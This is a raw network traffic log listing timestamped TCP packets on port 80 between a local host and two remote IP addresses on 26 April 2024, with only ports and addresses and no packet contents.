Apr 26, 2024 17:11:11.764003038 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764019012 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764024973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764054060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764070034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764075041 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764096022 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764126062 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764130116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764151096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764167070 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764172077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764193058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764209986 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764250994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764287949 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764307976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764364958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764384985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764400005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764405966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764426947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764450073 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764483929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764506102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764524937 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764544964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764565945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764580965 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764586926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764624119 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764626026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764646053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764677048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764688969 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764714956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764736891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764750957 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764758110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764777899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764786005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764833927 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764853954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764868021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764873981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764894962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764904976 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764915943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764935017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764946938 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764955044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764976025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.764987946 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.764997959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765017033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765029907 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765038013 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765070915 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765127897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765149117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765182018 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765305996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765327930 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765348911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765362978 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765369892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765403986 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765444040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765464067 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765484095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765495062 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765525103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765544891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765562057 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765569925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765605927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.765609980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765631914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.765667915 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.838044882 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:11.838151932 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:11.968318939 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:11.992506981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.992706060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.992731094 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.992753029 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.993886948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.993912935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.993928909 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994064093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994086981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994102955 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994343042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994384050 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994412899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994434118 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994455099 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994471073 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994487047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994509935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994524956 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994530916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994566917 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994575024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994596958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994616985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994631052 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994688988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994713068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994729042 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994771957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994792938 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994812012 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994833946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994869947 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994874001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994895935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.994931936 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.994977951 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995032072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995070934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995083094 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.995090961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995129108 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.995884895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995908976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995929003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995946884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.995950937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.995989084 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.996289968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.996314049 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.996354103 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.996378899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.996401072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.996445894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.997337103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.997360945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.997380972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.997397900 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.997401953 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.997422934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.997442961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.997443914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.997481108 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.998073101 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998094082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998115063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998136997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.998204947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998228073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998244047 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.998248100 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998269081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998289108 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998290062 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.998310089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998327017 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.998426914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998450041 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.998466969 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.999505997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999542952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999556065 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.999716043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999738932 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999756098 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.999759912 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999794960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.999802113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999840975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999878883 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:11.999910116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999953985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:11.999990940 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.000003099 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000078917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000118971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.000123024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000144958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000164986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000185013 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.000185966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000206947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000221968 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.000227928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000248909 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.000267982 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.024430990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024475098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024516106 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.024574995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024635077 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.024640083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024682999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024704933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024725914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024738073 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.024748087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.024789095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.025516033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.025557995 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.026040077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026084900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026125908 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.026144028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026166916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026187897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026209116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.026209116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026228905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026249886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026271105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.026278019 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.026293039 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.028549910 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028615952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028641939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.028664112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028702974 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.028851032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028872967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028908968 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.028954983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028975964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.028999090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029014111 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.029021025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029042006 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029057026 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.029632092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029670954 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.029679060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029721975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029751062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029759884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.029772997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.029808998 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.029859066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031318903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031343937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031363010 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031364918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031385899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031398058 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031405926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031426907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031440973 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031447887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031469107 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031482935 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031490088 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031527042 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031538963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031558990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031579971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031637907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031641960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031660080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031682014 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031682014 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031702995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031718016 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031723976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031759024 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031783104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031802893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031825066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031847954 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.031902075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.031939030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032427073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032449961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032470942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032485962 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032491922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032512903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032526970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032535076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032571077 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032597065 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032618046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032640934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032655001 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032661915 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032682896 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032696962 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032702923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032723904 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032736063 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032743931 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032764912 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032778025 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032784939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032805920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032821894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.032836914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.032867908 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.033978939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034003019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034025908 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034045935 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034121037 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034142971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034162045 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034162998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034184933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034199953 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034205914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034224987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034243107 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034255028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034276009 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034296036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034300089 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034317970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034337044 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034359932 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034380913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034409046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034420013 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034440041 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034456015 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034471035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034492970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034512043 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034550905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034579039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034599066 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.034600973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034621954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.034632921 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.035084009 CEST	80	49713	176.97.76.106	192.168.2.5
